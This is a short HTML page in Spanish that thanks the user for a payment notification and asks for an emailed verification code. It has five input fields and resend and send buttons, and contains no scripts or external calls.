
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    
</head>
<body>
    <div class="base-div" > 
        <p class="textop">¡GRACIAS!</p>
        <p class="textoagre">Hemos notificado su pago. Por favor, ingrese el código que le enviaremos a su correo electrónico</p>
        <input type="text" class="codigolol">
        <input type="text" class="codigololu">
        <input type="text" class="codigololu">
        <input type="text" class="codigololu">
        <input type="text" class="codigololu">
        <input type="submit" value="Reenviar de nuevo el codigo">
        <br>
       <input type="submit" style="margin-left: 40%;" value="Enviar codigo">
    </div>
</body>
</html>